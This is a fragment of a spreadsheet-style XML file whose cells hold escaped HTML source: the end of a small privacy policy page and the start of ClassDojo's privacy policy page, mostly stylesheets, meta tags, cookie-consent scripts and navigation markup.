    <t>We will notify you of any changes by posting the new Privacy Policy on this page.&lt;br&gt;
            This policy is effective as of 2020-07-08
        &lt;/p&gt;
        &lt;p&gt;&lt;b&gt;Contact Us&lt;/b&gt;&lt;br&gt;
            If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact us at &lt;a href="/cdn-cgi/l/email-protection#473e2831282c2e233407202a262e2b6924282a"&gt;&lt;span class="__cf_email__" data-cfemail="0d74627b626664697e4d6a606c6461236e6260"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.
        &lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;
    var height = document.getElementsByClassName("topnav")[0].clientHeight;
    document.getElementById("1-1").style.marginTop = height + "px";
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;meta charSet="utf-8"/&gt;&lt;meta http-equiv="x-ua-compatible" content="ie=edge"/&gt;&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/&gt;&lt;script type="text/javascript" src="/set-on-error-8.js"&gt;&lt;/script&gt;&lt;style data-href="/styles.5e8b10f85f3d965ebcd6.css" data-identity="gatsby-global-css"&gt;/*! modern-normalize v0.6.0 | MIT License | https://github.com/sindresorhus/modern-normalize */*,:after,:before{box-sizing:border-box}:root{-o-tab-size:4;tab-size:4}html{-webkit-text-size-adjust:100%;line-height:1.15}body{font-family:system-ui,-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji;margin:0}hr{height:0}abbr[title]{-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:SFMono-Regular,Consolas,Liberation Mono,Menlo,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,select{text-transform:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{padding:0}progress{vertical-align:baseline}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}summary{display:list-item}.buttonBack___1mlaL,.buttonFirst___2rhFr,.buttonLast___2yuh0,.buttonNext___2mOCa,.buttonNext___3Lm3s,.dot___3c3SI{cursor:pointer}.image___xtQGH{display:block;height:100%;width:100%}.spinner___27VUp{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:spin___S3UuE;animation-name:spin___S3UuE;-webkit-animation-timing-function:linear;animation-timing-function:linear;border:4px solid #a9a9a9;border-radius:30px;border-top-color:#000;height:30px;left:calc(50% - 15px);position:absolute;top:calc(50% - 15px);width:30px}@-webkit-keyframes spin___S3UuE{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes spin___S3UuE{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.container___2O72F{height:100%;overflow:hidden;position:relative;width:100%}.overlay___IV4qY{bottom:0;cursor:zoom-in;left:0;opacity:0;position:absolute;right:0;top:0;transition:opacity .3s,-webkit-transform .3s;transition:opacity .3s,transform .3s;transition:opacity .3s,transform .3s,-webkit-transform .3s}.hover___MYy31,.loading___1pvNI,.zoom___3kqYk{opacity:1}.imageLoadingSpinnerContainer___3UIPD{background-color:#f4f4f4;bottom:0;left:0;position:absolute;right:0;top:0}.slide___3-Nqo{box-sizing:border-box;display:block;height:0;list-style-type:none;margin:0;position:relative}.slide___3-Nqo:focus{outline:none!important}.slideHorizontal___1NzNV{float:left}[dir=rtl] .slideHorizontal___1NzNV{direction:rtl;-webkit-transform:scaleX(-1);transform:scaleX(-1)}.slideInner___2mfX9{height:100%;left:0;position:absolute;top:0;width:100%}.focusRing___1airF{bottom:5px;left:5px;outline-color:Highlight;outline-style:solid;outline-width:5px;pointer-events:none;position:absolute;right:5px;top:5px}@media (-webkit-min-device-pixel-ratio:0){.focusRing___1airF{outline-color:-webkit-focus-ring-color;outline-style:auto}}.horizontalSlider___281Ls{overflow:hidden;position:relative;touch-action:pan-y pinch-zoom}[dir=rtl] .horizontalSlider___281Ls{direction:ltr;-webkit-transform:scaleX(-1);transform:scaleX(-1)}.horizontalSliderTray___1L-0W{overflow:hidden;width:100%}.verticalSlider___34ZFD{overflow:hidden;position:relative}.verticalSliderTray___267D8{overflow:hidden}.verticalTray___12Key{float:left}.verticalSlideTrayWrap___2nO7o{overflow:hidden}.sliderTray___-vHFQ{display:block;list-style:none;margin:0;padding:0}.sliderAnimation___300FY{transition:-webkit-transform .5s;transition:transform .5s;transition:transform .5s,-webkit-transform .5s;transition-timing-function:cubic-bezier(.645,.045,.355,1);will-change:transform}.masterSpinnerContainer___1Z6hB{background-color:#f4f4f4;bottom:0;left:0;position:absolute;right:0;top:0}.react-slideshow-container{align-items:center;display:flex;position:relative}.react-slideshow-container .nav{cursor:pointer;position:absolute;z-index:10}.react-slideshow-container .nav: first-of-type{left:0}.react-slideshow-container .nav:last-of-type{right:0}.react-slideshow-container .default-nav{align-items:center;background:hsla(0,0%,100%,.6);border:0;border-radius:50%;color:#fff;display:flex;height:30px;justify-content:center;text-align:center;width:30px}.react-slideshow-container .default-nav:focus,.react-slideshow-container .default-nav:hover{background:#fff;color:#666;outline:0}.react-slideshow-container .default-nav.disabled:hover{cursor:not-allowed}.react-slideshow-container .default-nav:first-of-type{border-right:0;border-top:0;margin-right:-30px}.react-slideshow-container .default-nav:last-of-type{margin-left:-30px}.react-slideshow-container+ul.indicators{display:flex;flex-wrap:wrap;justify-content:center;margin-top:20px}.react-slideshow-container+ul.indicators li{display:inline-block;height:7px;margin:0;padding:5px;position:relative;width:7px}.react-slideshow-container+ul.indicators .each-slideshow-indicator{background</t>
  </si>
  <si>
    <t>: transparent;border:0;color:transparent;cursor:pointer;opacity:.25}.react-slideshow-container+ul.indicators .each-slideshow-indicator:before{background:#000;border-radius:50%;content:"";height:7px;left:0;position:absolute;text-align:center;top:0;width:7px}.react-slideshow-container+ul.indicators .each-slideshow-indicator.active,.react-slideshow-container+ul.indicators .each-slideshow-indicator:hover{opacity:.75;outline:0}.react-slideshow-fadezoom-wrapper{overflow:hidden;width:100%}.react-slideshow-fadezoom-wrapper .react-slideshow-fadezoom-images-wrap{display:flex;flex-wrap:wrap}.react-slideshow-fadezoom-wrapper .react-slideshow-fadezoom-images-wrap&gt;div{opacity:0;position:relative}.react-slideshow-wrapper .react-slideshow-fade-images-wrap&gt;div[aria-hidden=true]{display:none}.react-slideshow-wrapper.slide{overflow:hidden;width:100%}.react-slideshow-wrapper .images-wrap{display:flex;flex-wrap:wrap}.react-slideshow-wrapper .images-wrap&gt;div[aria-hidden=true]{display:none}.wall-of-love-card-enter{opacity:0;-webkit-transform:scale(.9);transform:scale(.9)}.wall-of-love-card-enter-active{opacity:1;-webkit-transform:translateX(0);transform:translateX(0);transition:opacity .3s,-webkit-transform .3s;transition:opacity .3s,transform .3s;transition:opacity .3s,transform .3s,-webkit-transform .3s}.wall-of-love-card-exit{opacity:1}.wall-of-love-card-exit-active{opacity:0;-webkit-transform:scale(.9);transform:scale(.9);transition:opacity .3s,-webkit-transform .3s;transition:opacity .3s,transform .3s;transition:opacity .3s,transform .3s,-webkit-transform .3s}&lt;/style&gt;&lt;meta name="generator" content="Gatsby 3.14.6"/&gt;&lt;link rel="canonical" href="https://classdojo.com/privacy/" data-baseprotocol="https:" data-basehost="classdojo.com"/&gt;&lt;title data-react-helmet="true"&gt;Privacy Policy | ClassDojo&lt;/title&gt;&lt;link data-react-helmet="true" rel="stylesheet" href="https://static.classdojo.com/fonts/proxima/proximanova-default-stack.css"/&gt;&lt;link data-react-helmet="true" rel="icon" href="/favicon.ico" sizes="any"/&gt;&lt;link data-react-helmet="true" rel="icon" href="/favicon.svg" type="image/svg+xml"/&gt;&lt;meta data-react-helmet="true" itemProp="name" content="Privacy Policy | ClassDojo"/&gt;&lt;meta data-react-helmet="true" property="og:title" content="Privacy Policy | ClassDojo"/&gt;&lt;meta data-react-helmet="true" name="description" content="Privacy Policy for ClassDojo"/&gt;&lt;meta data-react-helmet="true" itemProp="description" content="Privacy Policy for ClassDojo"/&gt;&lt;meta data-react-helmet="true" property="og:description" content="Privacy Policy for ClassDojo"/&gt;&lt;meta data-react-helmet="true" property="og:image" content="https://static.classdojo.com/uploads/054367e8-bd16-4b40-966a-97228437628d.png"/&gt;&lt;meta data-react-helmet="true" name="twitter:card" content="summary_large_image"/&gt;&lt;meta data-react-helmet="true" name="twitter:site" content="@classdojo"/&gt;&lt;meta data-react-helmet="true" name="twitter:creator" content="@classdojo"/&gt;&lt;meta data-react-helmet="true" name="twitter:title" content="Learn all about ClassDojo ♥"/&gt;&lt;meta data-react-helmet="true" name="twitter:description" content="ClassDojo helps teachers, parents, and students build amazing classroom communities.</t>
  </si>
  <si>
    <t>"/&gt;&lt;meta data-react-helmet="true" name="twitter:image" content="https://static.classdojo.com/img/social_icons/logo-purple-min.png"/&gt;&lt;meta data-react-helmet="true" name="twitter:dnt" content="on"/&gt;&lt;meta data-react-helmet="true" http-equiv="X-UA-Compatible" content="IE=edge"/&gt;&lt;meta data-react-helmet="true" name="apple-itunes-app" content="app-id=552602056"/&gt;&lt;meta data-react-helmet="true" name="HandheldFriendly" content="True"/&gt;&lt;meta data-react-helmet="true" name="author" content="ClassDojo"/&gt;&lt;meta data-react-helmet="true" property="og:type" content="website"/&gt;&lt;meta data-react-helmet="true" property="og:site_name" content="ClassDojo"/&gt;&lt;meta data-react-helmet="true" property="fb:app_id" content="171634556373284"/&gt;&lt;meta data-react-helmet="true" name="google-site-verification" content="Av0W9Fr00yNaww-mYNrSwsA8HRRHYn1Ipm_XYURVVVk"/&gt;&lt;script data-react-helmet="true" type="text/javascript" crossorigin="anonymous" src="https://cdn.cookielaw.org/consent/488d15e8-5436-4ecc-b202-0d14fac3afe8/OtAutoBlock.js"&gt;&lt;/script&gt;&lt;script data-react-helmet="true" src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" crossorigin="anonymous" charSet="UTF-8" data-domain-script="488d15e8-5436-4ecc-b202-0d14fac3afe8"&gt;&lt;/script&gt;&lt;script data-react-helmet="true" type="text/javascript"&gt;function OptanonWrapper() {
      const event = new Event('OneTrustGroupsUpdated');
      window.dispatchEvent(event)
      }&lt;/script&gt;&lt;link rel="sitemap" type="application/xml" href="/sitemap.xml"/&gt;&lt;link as="script" rel="preload" href="/webpack-runtime-3dfb8555be93a90683b0.js"/&gt;&lt;link as="script" rel="preload" href="/framework-b007f105ea2a5f4d3e93.js"/&gt;&lt;link as="script" rel="preload" href="/e6465497-df3298ea5835bf9747a9.js"/&gt;&lt;link as="script" rel="preload" href="/8c9c5d02-089fd9b2cc7d0fa4f308.js"/&gt;&lt;link as="script" rel="preload" href="/1bfc9850-303b7e00d98f7868d3d6.js"/&gt;&lt;link as="script" rel="preload" href="/app-48c414574cef07d4f204.js"/&gt;&lt;link as="script" rel="preload" href="/0159e93bfbb4141fe390f98a695fe2ff28f5c338-a77bfd39f8dbbb0d9ce1.js"/&gt;&lt;link as="script" rel="preload" href="/component---src-www-privacy-tsx-5a6c8232ed92a9630efc.js"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/privacy/page-data.json?44b0bb50c7b6dafb0d870a442" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/1070640141.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/1167623312.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/1813978998.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/2732140585.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/2744905544.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/3292709676.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/3352044764.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/3596176448.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/3860515507.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/4078277710.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/sq/d/787815624.json" crossorigin="anonymous"/&gt;&lt;link as="fetch" rel="preload" href="/page-data/app-data.json?44b0bb50c7b6dafb0d870a442" crossorigin="anonymous"/&gt;&lt;/head&gt;&lt;body&gt;&lt;script&gt;(function() { try {
  var mode = localStorage.getItem('theme-ui-color-mode');
  if (!mode) return
  document.documentElement.classList.add('theme-ui-' + mode);
  document.body.classList.add('theme-ui-' + mode);
} catch (e) {} })();&lt;/script&gt;&lt;div id="___gatsby"&gt;&lt;style data-emotion="css-global 1m6kvr7"&gt;html{--theme-ui-colors-black:#000;--theme-ui-colors-white:#fff;--theme-ui-colors-text:#363636;--theme-ui-colors-blue:#007aff;--theme-ui-colors-lightBlue:#e8f2ff;--theme-ui-colors-darkBlue:#049;--theme-ui-colors-gray:#4f6f8f;--theme-ui-colors-lightGray:#f4f6f8;--theme-ui-colors-buttonGray:#edf0f3;--theme-ui-colors-borderGray:#eee;--theme-ui-colors-darkGray:#364049;--theme-ui-colors-green:#0a0;--theme-ui-colors-lightGreen:#ecf7ec;--theme-ui-colors-darkGreen:#060;--theme-ui-colors-red:#c00;--theme-ui-colors-lightRed:#fbebeb;--theme-ui-colors-darkRed:#800;--theme-ui-colors-orange:#f68013;--theme-ui-colors-darkOrange:#f06f20;--theme-ui-colors-lightOrange:#fef2e7;--theme-ui-colors-purple:#70b;--theme-ui-colors-lightPurple:#f5ebfa;--theme-ui-colors-yellow:#fedc2a;--theme-ui-colors-lightYellow:#fff3c0;--theme-ui-colors-pink:#fe3e81;--theme-ui-colors-darkPurple:#70b;color:var(--theme-ui-colors-text);background-color:var(--theme-ui-colors-background);}&lt;/style&gt;&lt;style data-emotion="css-global 0"&gt;&lt;/style&gt;&lt;div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper"&gt;&lt;style data-emotion="css-global gm0eln"&gt;html{box-sizing:border-box;}*,*::before,*::after{box-sizing:inherit;}html{font-size:16px!important;line-height:1.4!important;}body{width:100%;font-family:proxima-nova,'Helvetica Neue',Helvetica,Arial,sans-serif;color:#363636;background-color:#fff;overflow-x:hidden;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;}a{color:#00B2F7;-webkit-text-decoration:none;text-decoration:none;cursor:pointer;}a:hover,a:focus{-webkit-text-decoration:none;text-decoration:none;}img{max-width:100%;object-fit:contain;position:relative;}figure{margin:2rem 0;}figcaption{font-size:80%;}table{width:100%;margin-bottom:1rem;border:1px solid #4f6f8f;font-size:85%;border-collapse:collapse;}td,th{padding:.25rem .5rem;border:1px</t>
  </si>
  <si>
    <t>solid #4f6f8f;}th{text-align:left;}tbody tr:nth-of-type(odd) td{background-color:#f4f6f8;}tbody tr:nth-of-type(odd) tr{background-color:#f4f6f8;}h1,h2,h3,h4,h5,h6{margin-top:1.414rem;margin-bottom:.5rem;color:#000;font-weight:600;line-height:1.25;text-rendering:optimizeLegibility;}h1{margin-top:0;font-size:36rem;}h2{font-size:32rem;}h3{font-size:24rem;}h4,h5,h6{font-size:20rem;}p{margin-top:0;margin-bottom:1rem;}ul,ol,dl{margin-top:0;margin-bottom:1rem;}dt{font-weight:bold;}dd{margin-bottom:.5rem;}hr{position:relative;margin:1.5rem 0;border:0;border-top:1px solid #4f6f8f;}blockquote{margin:.8rem 0;padding:.5rem 1rem;border-left:.25rem solid #4f6f8f;color:#4f6f8f;}blockquote p:last-child{margin-bottom:0;}@media (min-width: 992px){blockquote{padding-right:5rem;padding-left:1.25rem;}}#___gatsby,#gatsby-focus-wrapper,main,html,body{height:100%;}.ReactModal__Content{opacity:0;-webkit-transform:translate(0, -50%);-moz-transform:translate(0, -50%);-ms-transform:translate(0, -50%);transform:translate(0, -50%);-webkit-transition:-webkit-transform 300ms ease-out;transition:transform 300ms ease-out;}.ReactModal__Content--after-open{opacity:1;-webkit-transform:translate(0, 0);-moz-transform:translate(0, 0);-ms-transform:translate(0, 0);transform:translate(0, 0);}.ReactModal__Content--before-close{opacity:0;-webkit-transform:translate(0, -50%);-moz-transform:translate(0, -50%);-ms-transform:translate(0, -50%);transform:translate(0, -50%);}&lt;/style&gt;&lt;style data-emotion="css d8crgb"&gt;.css-d8crgb{position:absolute;left:-10000px;}.css-d8crgb:focus{position:fixed;left:100px;z-index:10000;color:black;}&lt;/style&gt;&lt;a href="#page-content" tabindex="0" class="css-d8crgb e1mtm2120"&gt;Skip content&lt;/a&gt;&lt;div&gt;&lt;/div&gt;&lt;style data-emotion="css 17e9cs6"&gt;.css-17e9cs6{box-sizing:border-box;min-width:0;margin:0;height:100%;position:absolute;left:0;right:0;top:0;}&lt;/style&gt;&lt;main id="main-page-container" class="css-17e9cs6 ebnlmq30"&gt;&lt;style data-emotion="css m4i65p"&gt;.css-m4i65p{border-bottom:1px solid;border-color:#D3D7EC;position:fixed;background-color:#fff;right:0;left:0;top:0;z-index:1000;-webkit-flex:0 0 auto;-ms-flex:0 0 auto;flex:0 0 auto;}@media print{.css-m4i65p{display:none;}}&lt;/style&gt;&lt;nav role="navigation" class="css-m4i65p e1hmytjs2"&gt;&lt;style data-emotion="css 127d8un"&gt;.css-127d8un{position:relative;display:grid;grid-template-columns:auto min-content;height:88px;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;justify-items:start;z-index:1010;}@media print{.css-127d8un{display:none;}}&lt;/style&gt;&lt;style data-emotion="css 18dky24"&gt;.css-18dky24{position:relative;margin:0 auto;box-sizing:border-box;width:100%;height:100%;padding-left:15px;padding-right:15px;position:relative;display:grid;grid-template-columns:auto min-content;height:88px;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;justify-items:start;z-index:1010;}@media screen and (min-width: 768px){.css-18dky24{width:750px;}}@media screen and (min-width: 992px){.css-18dky24{width:970px;}}@media screen and (min-width: 1200px){.css-18dky24{width:1170px;}}@media print{.css-18dky24{display:none;}}&lt;/style&gt;&lt;div class="e1hmytjs1 css-18dky24 e1pzrm670"&gt;&lt;a href="/"&gt;&lt;style data-emotion="css xcnkp8"&gt;.css-xcnkp8{width:176px;z-index:1;position:relative;box-shadow:0px 0px 20px #ffffff;}&lt;/style&gt;&lt;div class="css-xcnkp8 e1hmytjs0 gatsby-image-wrapper" style="position:relative;overflow:hidden"&gt;&lt;div aria-hidden="true" style="width:100%;padding-bottom:29.000000000000004%"&gt;&lt;/div&gt;&lt;picture&gt;&lt;source srcSet="/static/8ceb13c1cedc11f744c9077b520d0c79/65e33/classdojo_logo_176%402x.png 100w,
/static/8ceb13c1cedc11f744c9077b520d0c79/69585/classdojo_logo_176%402x.png 200w,
/static/8ceb13c1cedc11f744c9077b520d0c79/39223/classdojo_logo_176%402x.png 352w" sizes="(max-width: 352px) 100vw, 352px"/&gt;&lt;img sizes="(max-width: 352px) 100vw, 352px" srcSet="/static/8ceb13c1cedc11f744c9077b520d0c79/65e33/classdojo_logo_176%402x.png 100w,
/static/8ceb13c1cedc11f744c9077b520d0c79/69585/classdojo_logo_176%402x.png 200w,
/static/8ceb13c1cedc11f744c9077b520d0c79/39223/classdojo_logo_176%402x.png 352w" src="/static/8ceb13c1cedc11f744c9077b520d0c79/39223/classdojo_logo_176%402x.png" alt="ClassDojo logo" loading="eager" style="position:absolute;top:0;left:0;width:100%;height:100%;object-fit:cover;object-position:center;opacity:0;transition:opacity 500ms"/&gt;&lt;/picture&gt;&lt;noscript&gt;&lt;picture&gt;&lt;source srcset="/static/8ceb13c1cedc11f744c9077b520d0c79/65e33/classdojo_logo_176%402x.png 100w,
/static/8ceb13c1cedc11f744c9077b520d0c79/69585/classdojo_logo_176%402x.png 200w,
/static/8ceb13c1cedc11f744c9077b520d0c79/39223/classdojo_logo_176%402x.png 352w" sizes="(max-width: 352px) 100vw, 352px" /&gt;&lt;img loading="eager" sizes="(max-width: 352px) 100vw, 352px" srcset="/static/8ceb13c1cedc11f744c9077b520d0c79/65e33/classdojo_logo_176%402x.png 100w,
/static/8ceb13c1cedc11f744c9077b520d0c79/69585/classdojo_logo_176%402x.png 200w,
/static/8ceb13c1cedc11f744c9077b520d0c79/39223/classdojo_logo_176%402x.png 352w" src="/static/8ceb13c1cedc11f744c9077b520d0c79/39223/classdojo_logo_176%402x.png" alt="ClassDojo logo" style="position:absolute;top:0;left:0;opacity:1;width:100%;height:100%;object-fit:cover;object-position:center"/&gt;&lt;/picture&gt;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;div role="dialog" aria-modal="true"&gt;&lt;style data-emotion="css lboq8x"&gt;.css-lboq8x{height:14px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:justify;-webkit-justify-content:space-between;justify-content:space-between;border:0;background:transparent;border-radius:5px;box-sizing:content-box;cursor:pointer;padding:9px 10px;margin-left:auto;box-shadow:0px 0px 20px</t>
  </si>
  <si>
    <t>#fff;position:relative;z-index:1;background-color:transparent;}@media screen and (min-width:1200px){.css-lboq8x{display:none;}}&lt;/style&gt;&lt;button aria-expanded="false" aria-label="Menu" class="css-lboq8x e5rzbx1"&gt;&lt;style data-emotion="css 12jtxle"&gt;.css-12jtxle{display:block;width:22px;height:2px;border-radius:1px;background-color:#545382;}&lt;/style&gt;&lt;span class="css-12jtxle e5rzbx0"&gt;&lt;/span&gt;&lt;span class="css-12jtxle e5rzbx0"&gt;&lt;/span&gt;&lt;span class="css-12jtxle e5rzbx0"&gt;&lt;/span&gt;&lt;/button&gt;&lt;style data-emotion="css 5jw6hl"&gt;.css-5jw6hl{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;width:100vw;padding:18px 0;margin-bottom:0;overflow:hidden;position:fixed;top:88px;left:0;-webkit-transform:translateY(calc(-100% - 88px));-moz-transform:translateY(calc(-100% - 88px));-ms-transform:translateY(calc(-100% - 88px));transform:translateY(calc(-100% - 88px));-webkit-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;background:#fff;border-bottom:1px solid;border-color:#D3D7EC;}@media screen and (min-width:1200px){.css-5jw6hl{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;width:auto;padding:0;opacity:1;position:static;-webkit-transform:translateY(0);-moz-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0);border-bottom:0;}}@media screen and (max-width:1199px){.css-5jw6hl{-webkit-animation:entering 0.5s;animation:entering 0.5s;opacity:0;}.css-5jw6hl&gt;*{display:none;}}@media print{.css-5jw6hl{display:none;}}@-webkit-keyframes entering{0%{opacity:0;}99%{opacity:0;}100%{opacity:1;}}@keyframes entering{0%{opacity:0;}99%{opacity:0;}100%{opacity:1;}}&lt;/style&gt;&lt;ul aria-hidden="true" class="css-5jw6hl eounsk91"&gt;&lt;style data-emotion="css 1av80no"&gt;.css-1av80no{padding:10px 15px;list-style:none;margin-top:0;}@media screen and (min-width:1200px){.css-1av80no{padding:0;}}&lt;/style&gt;&lt;li class="css-1av80no edbptmw0"&gt;&lt;style data-emotion="css 1x204xj"&gt;.css-1x204xj{background:none;border:none;-webkit-text-decoration:none;text-decoration:none;padding:10px 15px;cursor:pointer;}.css-1x204xj:hover,.css-1x204xj:focus{-webkit-text-decoration:none;text-decoration:none;}&lt;/style&gt;&lt;a class="css-1x204xj e1726gi31" href="/plus/"&gt;&lt;style data-emotion="css 1qhg48d"&gt;.css-1qhg48d{color:#2C2A50;font-weight:500;line-height:22px;font-family:proxima-nova,"Helvetica Neue",Helvetica,Arial,sans-serif;word-break:keep-all;white-space:nowrap;}.css-1qhg48d:hover{color:#00B2F7;-webkit-text-decoration:none;text-decoration: none;}&lt;/style&gt;&lt;span class="css-1qhg48d eounsk90"&gt;Plus&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="css-1av80no edbptmw0"&gt;&lt;a class="css-1x204xj e1726gi31" href="/about/"&gt;&lt;span class="css-1qhg48d eounsk90"&gt;About us&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="css-1av80no edbptmw0"&gt;&lt;a class="css-1x204xj e1726gi31" href="/schools/"&gt;&lt;span class="css-1qhg48d eounsk90"&gt;Schools&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="css-1av80no edbptmw0"&gt;&lt;a class="css-1x204xj e1726gi31" href="/resources/"&gt;&lt;span class="css-1qhg48d eounsk90"&gt;Resources&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;style data-emotion="css ffhm6p"&gt;.css-ffhm6p{list-style-type:none;}&lt;/style&gt;&lt;li class="css-ffhm6p e1q9gmh80"&gt;&lt;a to="" href="https://teach.classdojo.com/" class="css-1x204xj e1726gi30"&gt;&lt;span class="css-1qhg48d e1q9gmh82"&gt;Teacher login&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="css-ffhm6p e1q9gmh80"&gt;&lt;a to="" href="https://home.classdojo.com/" class="css-1x204xj e1726gi30"&gt;&lt;span class="css-1qhg48d e1q9gmh82"&gt;Parent login&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;/nav&gt;&lt;style data-emotion="css hqsi8w"&gt;@media print{.css-hqsi8w{display:none;}}&lt;/style&gt;&lt;style data-emotion="css 14o5pm8"&gt;.css-14o5pm8{height:88px;}@media print{.css-14o5pm8{display:none;}}&lt;/style&gt;&lt;div height="88px" class="css-14o5pm8 e1qm6kkm0"&gt;&lt;/div&gt;&lt;div id="page-content" tabindex="-1"&gt;&lt;div class="css-0 eyvagkw7"&gt;&lt;style data-emotion="css 66y8zs"&gt;.css-66y8zs{background-color:#00aeef;box-sizing:border-box;height:90px;padding:30px 15px;margin-bottom:10px;text-align:center;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-ms-flex-pack:center;-webkit-justify-content:center;justify-content:center;}@media screen and (min-width:992px){.css-66y8zs{height:250px;margin-bottom:30px;padding:48px 0;}}@media print{.css-66y8zs{display:none;}}&lt;/style&gt;&lt;div class="css-66y8zs eyvagkw5"&gt;&lt;style data-emotion="css 1v13jx8"&gt;.css-1v13jx8{box-sizing:border-box;color:#fff;font-size:31px;font-weight:400;line-height:1.1;margin:0;text-shadow:rgba(4, 76, 102, 0.5) 2px 2px</t>
  </si>
  <si>
    <t>2px;text-align:center;}@media screen and (min-width:768px){.css-1v13jx8{font-size:52.8px;font-weight:800;}}&lt;/style&gt;&lt;h1 class="css-1v13jx8 eyvagkw4"&gt;Privacy Policy&lt;/h1&gt;&lt;/div&gt;&lt;style data-emotion="css w2ft9l"&gt;.css-w2ft9l{position:relative;margin:0 auto;box-sizing:border-box;width:100%;padding-left:15px;padding-right:15px;}@media screen and (min-width: 768px){.css-w2ft9l{width:750px;}}@media screen and (min-width: 992px){.css-w2ft9l{width:970px;}}@media screen and (min-width: 1200px){.css-w2ft9l{width:1170px;}}&lt;/style&gt;&lt;div class="css-w2ft9l e1pzrm670"&gt;&lt;style data-emotion="css my9yfq"&gt;@media print{.css-my9yfq{display:none;}}&lt;/style&gt;&lt;div style="text-align:right" class="css-my9yfq eyvagkw6"&gt;&lt;style data-emotion="css 1v7dsq7"&gt;.css-1v7dsq7{display:inline-block;position:relative;font-family:proxima-nova,"Helvetica Neue",Helvetica,Arial,sans-serif;line-height:1.5;font-size:16px;box-sizing:border-box;color:white;background-color:#00aeef;padding:5px 18px 5px 18px;font-weight:600;text-align:center;-webkit-text-decoration:none;text-decoration:none;vertical-align:middle;touch-action:manipulation;cursor:pointer;border:1px solid transparent;white-space:nowrap;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border-radius:30px;}.css-1v7dsq7:hover{background-color:#24c4ff;border-color:#24c4ff;-webkit-text-decoration:none;text-decoration:none;}.css-1v7dsq7:active{box-shadow:inset 0 3px 5px rgba(0, 0, 0, 0.125);-webkit-text-decoration:none;text-decoration:none;}&lt;/style&gt;&lt;button class="css-1v7dsq7 e1qxbpsp0" style="position:static"&gt;Print policy&lt;/button&gt;&lt;/div&gt;&lt;style data-emotion="css 